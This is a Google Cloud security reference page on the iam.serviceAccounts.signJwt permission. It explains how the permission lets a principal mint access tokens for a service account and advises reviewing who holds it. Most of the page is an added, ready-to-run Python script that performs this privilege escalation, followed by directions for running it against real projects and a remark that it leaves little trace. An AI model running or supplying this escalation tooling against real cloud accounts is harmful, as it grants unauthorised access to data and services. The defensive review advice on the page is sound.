services / Google Cloud / Service Accounts
Service accounts are Google accounts intended for use by applications and workloads, rather than people, to authenticate to Google Cloud APIs. They can be either Google-managed or user-managed.
Many of the permissions on service accounts are extremely sensitive, because service accounts are frequently overprovisioned. A principal who can obtain credentials for a service account (a key, an access token, or a JWT signed with its key) effectively holds every permission granted to that service account, so broad access to service accounts lets principals gain access they were never directly granted.
iam.serviceAccounts.signJwt
Can be used for privilege escalation by signing an access token request. A principal holding this permission on a service account can call the IAM Service Account Credentials API method projects.serviceAccounts.signJwt, which signs an arbitrary caller-supplied JWT payload with the service account's Google-managed private key. If the payload is an OAuth 2.0 JWT bearer assertion (iss set to the service account's email, aud set to https://oauth2.googleapis.com/token, the desired scope, and an exp no more than one hour after iat), the token endpoint exchanges the signed JWT for an access token for that service account, and the caller then acts with every role the service account holds without ever possessing a key. The same method can also mint self-signed JWTs that many Google APIs accept directly as bearer credentials. The permission is included in roles/iam.serviceAccountTokenCreator; review who holds that role, and any custom role containing signJwt, on each service account, and treat those holders as having the service account's full access.
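The escalation chain described above, as an added example that is not part of the original page or P0 Security's own tooling. It assumes the caller already holds a Google access token with iam.serviceAccounts.signJwt on the target service account; the fake_transport stand-in, the service account email and the returned token value are constructed so the two requests can be exercised offline, and urllib_post is the real transport.

```python
"""Added example, not P0 Security's code: the signJwt -> access-token
escalation chain with the HTTP transport injected, so the two requests can
be built and run offline against a constructed stand-in for Google's endpoints."""
import base64
import json
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Sequence, Tuple
from urllib.parse import parse_qs, urlencode

IAM_CREDENTIALS = "https://iamcredentials.googleapis.com/v1"
TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"
CLOUD_PLATFORM = "https://www.googleapis.com/auth/cloud-platform"

# post(url, headers, body) -> (http_status, response_body)
Post = Callable[[str, Dict[str, str], bytes], Tuple[int, bytes]]

def build_claims(sa_email: str, scopes: Sequence[str] = (CLOUD_PLATFORM,),
                 now: Optional[int] = None, lifetime: int = 3600) -> dict:
    """Claim set for the OAuth 2.0 JWT bearer grant: iss is the service
    account, aud is the token endpoint, exp at most one hour after iat."""
    if lifetime > 3600:
        raise ValueError("the token endpoint rejects assertions valid > 1 hour")
    now = int(time.time()) if now is None else now
    return {"iss": sa_email, "scope": " ".join(scopes), "aud": TOKEN_ENDPOINT,
            "iat": now, "exp": now + lifetime}

def sign_jwt_request(sa_email: str, claims: dict) -> Tuple[str, bytes]:
    """URL and JSON body for projects.serviceAccounts.signJwt; 'projects/-'
    lets the API resolve the project from the service account's email."""
    url = f"{IAM_CREDENTIALS}/projects/-/serviceAccounts/{sa_email}:signJwt"
    return url, json.dumps({"payload": json.dumps(claims)}).encode()

def token_request(signed_jwt: str) -> Tuple[str, bytes]:
    """Form body that exchanges the signed assertion for an access token."""
    form = {"grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
            "assertion": signed_jwt}
    return TOKEN_ENDPOINT, urlencode(form).encode()

def escalate(caller_token: str, sa_email: str, post: Post,
             now: Optional[int] = None) -> str:
    """caller_token is the caller's own access token; it only needs
    iam.serviceAccounts.signJwt on sa_email. Returns an access token for sa_email."""
    url, body = sign_jwt_request(sa_email, build_claims(sa_email, now=now))
    status, resp = post(url, {"Authorization": f"Bearer {caller_token}",
                              "Content-Type": "application/json"}, body)
    if status != 200:
        raise PermissionError(f"signJwt returned {status}: {resp!r}")
    signed_jwt = json.loads(resp)["signedJwt"]
    url, body = token_request(signed_jwt)
    status, resp = post(url, {"Content-Type": "application/x-www-form-urlencoded"}, body)
    if status != 200:
        raise RuntimeError(f"token endpoint returned {status}: {resp!r}")
    return json.loads(resp)["access_token"]

def urllib_post(url: str, headers: Dict[str, str], body: bytes) -> Tuple[int, bytes]:
    """Real transport over urllib; pass to escalate() when network is available."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req) as r:
            return r.status, r.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def fake_transport(valid_caller_token: str, sa_email: str) -> Post:
    """Constructed stand-in for both Google endpoints. It 'signs' by base64url-
    encoding the payload, which is not a signature; the real API returns an
    RS256 JWT signed with the service account's Google-managed key."""
    def post(url: str, headers: Dict[str, str], body: bytes) -> Tuple[int, bytes]:
        if url == f"{IAM_CREDENTIALS}/projects/-/serviceAccounts/{sa_email}:signJwt":
            if headers.get("Authorization") != f"Bearer {valid_caller_token}":
                return 403, b'{"error":{"code":403,"status":"PERMISSION_DENIED"}}'
            payload = json.loads(body)["payload"]
            header = _b64url(b'{"alg":"RS256","typ":"JWT"}')
            jwt = f"{header}.{_b64url(payload.encode())}.constructed-signature"
            return 200, json.dumps({"keyId": "constructed", "signedJwt": jwt}).encode()
        if url == TOKEN_ENDPOINT:
            assertion = parse_qs(body.decode())["assertion"][0]
            seg = assertion.split(".")[1]
            claims = json.loads(base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4)))
            if claims.get("aud") != TOKEN_ENDPOINT or claims.get("iss") != sa_email:
                return 400, b'{"error":"invalid_grant"}'
            return 200, json.dumps({"access_token": "ya29.constructed-token",
                                    "expires_in": 3599, "token_type": "Bearer"}).encode()
        return 404, b"not found"
    return post

if __name__ == "__main__":
    sa = "app-sa@my-project.iam.gserviceaccount.com"   # constructed
    transport = fake_transport("caller-token", sa)       # swap for urllib_post
    print(escalate("caller-token", sa, transport))
```

To run it for real, pass urllib_post instead of the stand-in and a caller token such as the output of gcloud auth print-access-token; the equivalent first step from the CLI is gcloud iam service-accounts sign-jwt with --iam-account. Note that the service account's private key never leaves Google, so there is no key file to find on disk afterwards: the only record of the escalation is the signJwt call itself.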
Risks
Scope: CRITICAL
This privilege may grant access to sensitive data from a significant fraction of organizational functions, allow interruption of critical organizational services, or, if exploited, lead to significant privilege escalation.
Contributed by P0 Security